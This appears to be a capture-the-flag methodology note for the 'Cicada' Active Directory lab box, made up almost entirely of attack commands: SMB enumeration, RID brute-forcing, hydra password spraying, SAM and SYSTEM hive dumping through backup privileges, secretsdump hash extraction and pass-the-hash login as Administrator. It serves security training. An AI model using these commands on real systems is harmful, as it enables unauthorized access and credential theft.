Easy Box:

Here’s an enhanced AD exploitation methodology with commands for each step:


Methodology for AD Enumeration and Exploitation

1. Initial Reconnaissance and Scanning

  • Identify Open Ports: Use nmap to scan common AD ports.

    nmap $target --top-ports=1000 -sV -v -sC -Pn > nmap.out
  • Host Configuration: Update /etc/hosts with the target hostname if needed.

    echo "$target cicada.htb" | sudo tee -a /etc/hosts

2. SMB Enumeration and Credential Gathering

  • Anonymous SMB Access: Use smbclient to list available shares.

    smbclient -L //$target -N
  • User Enumeration with RID Brute-forcing:

    nxc smb $target -u 'anonymous' -p '' --rid-brute 3000
  • SMB Information Gathering:

    enum4linux-ng -A $target

3. Password Discovery and Validation

  • Testing Credentials: Use tools like hydra or crackmapexec to test passwords.

    hydra -L usernames.txt -p $password smb://$target
  • Access Restricted Shares with Discovered Credentials:

    smbclient //$target/DEV -U 'username%password'

4. Initial Foothold

  • Remote Access: Use evil-winrm to log in with valid credentials.

    evil-winrm -i $target -u 'username' -p 'password'

5. Privilege Escalation

  • Identify Special Privileges:

    whoami /all
  • Backup Privileges: Use reg to save critical files to accessible locations.

    reg save hklm\sam c:\Temp\sam
    reg save hklm\system c:\Temp\system

6. Extract and Use Password Hashes

  • Download SAM and SYSTEM Files:

    download c:\Temp\sam
    download c:\Temp\system
  • Dump Password Hashes:

    python3 secretsdump.py -sam sam -system system LOCAL > hashes.txt
  • Root Access: Use evil-winrm with the Administrator NT hash (the -H option takes only the NT half of the user:rid:LM:NT::: line from hashes.txt, not LM:NT).

    evil-winrm -i $target -u 'Administrator' -H 'nthash'

This methodical approach covers enumeration, initial access, and privilege escalation for an easy AD box. Taken from the Cicada machine.

References:
  1. Medium: Cicada machine walkthrough
  2. Sickboy's GitHub AD cheat sheet